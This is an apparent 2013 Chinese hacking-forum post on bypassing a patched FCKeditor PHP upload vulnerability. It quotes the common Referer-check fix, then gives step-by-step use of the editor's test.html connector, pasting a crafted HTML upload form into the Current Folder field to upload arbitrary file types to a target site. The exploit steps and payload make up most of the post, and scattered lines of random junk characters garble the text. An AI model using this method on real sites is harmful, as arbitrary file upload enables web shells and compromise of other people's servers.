中国网络渗透测试联盟
标题:
fckeditor 漏洞修复后的二次利用
[打印本页]
作者:
admin
时间:
2013-1-11 21:12
标题:
fckeditor 漏洞修复后的二次利用
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
# E1 b9 h# s7 @2 D& O( O. W
网上给出的修复方案是
$ ?$ ^) a! B' A. L. y- V s
修复方法,删除FCK编辑器用其他的编辑器
5 ^; M3 n* s! \. N h( a
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
0 E- x9 G& A4 l& p
在
* ?# n0 k; Y1 @/ `+ ^& @
require(‘config.php’);
1 M) C6 Z! m6 P+ }4 _
require(‘util.php’);
- i) S, ? ]6 L5 f
的下面添加以下代码—————————–
; n& ?- C$ f- S8 V
//防止外部提交
: Q/ J3 t" j, ?, w3 a8 {& I+ l. v
function outsidepost()
{) s6 b, Q4 E: u- v
{
! ]' z/ |6 d4 {7 Y
$servername=$_SERVER['SERVER_NAME'];
: s* z9 [& n. r0 E) C
$sub_from=@$_SERVER['HTTP_REFERER'];
8 L5 |6 K- ~2 |) A0 d
$sub_len=strlen($servername);
8 M3 {( B9 [: h
$checkfrom=substr($sub_from,7,$sub_len);
) R/ T4 Z; W! l ?: [
if($checkfrom!=$servername){
' }& B* C) Q& J" S/ m5 j
echo(“you don’t outsidepost!”);
; D5 ?( X/ Z3 b. o" j' g; F
exit;
2 X+ U. A+ z9 ~; M0 c
}
% I4 ^: Z- C6 y
}
o- M* w6 H5 ^ ?$ C, }
outsidepost();
9 P5 p$ N/ k5 M# W) a5 ^
防止外部提交,但是没有防止内部提交,
/ p( U! O/ d- h6 a% o9 I
利用方法:
- r" G5 _7 a/ ~- n5 r- O- ^* u
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
$ b2 ]# q2 \+ O
2,在Current Folder 框输入
, d1 A( T( `0 A: H; C* G8 G
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
$ b, J2 b) c9 o$ r
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
3 A/ s# n+ B, F3 L. G0 l! k# o
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2